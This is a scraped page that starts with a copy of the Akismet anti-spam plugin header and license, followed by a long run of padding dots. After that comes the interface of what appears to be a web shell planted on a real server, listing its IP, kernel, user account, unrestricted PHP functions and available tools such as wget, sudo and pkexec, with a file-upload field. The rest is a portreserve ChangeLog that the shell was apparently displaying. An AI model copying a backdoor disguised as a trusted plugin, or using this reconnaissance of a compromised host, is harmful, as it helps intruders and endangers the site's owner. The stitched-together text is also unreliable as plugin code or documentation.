#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/portreserve-0.0.5/ |
Upload File : |
2011-06-24 Tim Waugh <twaugh@redhat.com> * configure.in: Version 0.0.5. 2011-06-23 Tim Waugh <twaugh@redhat.com> * src/portreserve.c: Fixed linked-list handling when removing items. * src/portreserve.c: Don't write pidfile when running in debug mode. 2011-05-13 Jiri Popelka <jpopelka@redhat.com> * src/portreserve.c: Fix small memory leak (Coverity). 2010-11-18 Tim Waugh <twaugh@redhat.com> * portreserve.init: Fixed exit code for "status" action (bug #619089). 2010-01-22 Tim Waugh <twaugh@redhat.com> * src/portreserve.c: Walk the list of newmaps correctly. 2009-02-26 Tim Waugh <twaugh@redhat.com> * configure.in: Version 0.0.4. 2009-02-26 Tim Waugh <twaugh@redhat.com> * portreserve.init: The initscript does not depend on the $network service (bug #487250). 2008-07-01 Tim Waugh <twaugh@redhat.com> * configure.in: Version 0.0.3. 2008-07-01 Tim Waugh <twaugh@redhat.com> * doc/portreserve.xml: Document configuration file format more precisely. * src/portreserve.c (reserve): Iterate over each line in the configuration file. Fixes https://fedorahosted.org/portreserve/ticket/1 and https://fedorahosted.org/portreserve/ticket/2. 2008-07-01 Tim Waugh <twaugh@redhat.com> * src/portreserve.c (reserve): Change return type to struct map pointer, and bind for each protocol specified. (portreserve): Handle '*' in the same way as a particular service, as a service may have more than one mapping. * doc/portreserve.xml: Updated. 2008-06-30 Tim Waugh <twaugh@redhat.com> * configure.in: Version 0.0.2. 2008-05-08 Tim Waugh <twaugh@redhat.com> * portreserve.init (prog): Avoid stale pidfile, and fixed typo. 2008-05-08 Tim Waugh <twaugh@redhat.com> * configure.in: Version 0.0.1. 2008-05-08 Tim Waugh <twaugh@redhat.com> * portreserve.init: Added chkconfig header back in. Simplified initscript. * portreserve.spec.in: Fixed license tag. Better buildroot tag. * portreserve.init: LSB headers; PID file handling; don't start daemon if there are no registered services. Patch from Debian. * src/portreserve.c (fcntl_lock): New function, from libslack. (daemon_lock_pidfile): New function, from libslack. (create_pidfile): New function. (main): Handle TERM, INT, QUIT and KILL signals. Create and remove pidfile. Patch from Debian. * src/portreserve.c (reserve): Use htons() on the port number for getservbyport(). Patch from Debian. 2003-09-03 Tim Waugh <twaugh@redhat.com> * configure.in: Version 0.0.0.